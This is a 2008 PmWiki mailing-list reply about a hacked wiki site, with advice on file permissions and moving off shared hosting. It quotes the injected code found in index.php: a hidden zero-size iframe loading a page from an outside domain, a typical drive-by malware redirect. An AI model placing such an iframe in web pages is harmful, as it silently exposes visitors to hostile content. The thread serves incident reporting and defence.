[pmwiki-users] More hacking

Marcus prima at wordit.com
Thu Sep 4 19:14:15 CDT 2008


On Wed, Sep 3, 2008 at 2:50 PM, Erik Haagensen <erik.haa at gmail.com> wrote:
> The index.php (and several other files) contains this now:
>
> <?php include('pmwiki.php');
> <iframe src="http://mixlong.cn/in/" width=0 height=0 frameborder=0></iframe>


I reported the same incident a few months ago. It happened on shared
hosting. The files were NOT writable by the web server, only by the
owner. My guess is that vulnerabilities in other scripts were being
exploited.

The fast solution is to make all files read-only except for the wiki.d
directory.

If the site is only edited by you occasionally, then that directory
can be read-only too. Just chmod the directory in your FTP client or
via SSH before editing, then set it back afterwards.

The other thing I did was move to a VPS where you don't have 100 other
users prowling around the same installation. Even if Pmwiki is secure,
loopholes in other user's scripts and applications mean they could be
used to inject malicious data into Pmwiki files, or any other files
which are writeable.


Marcus



More information about the pmwiki-users mailing list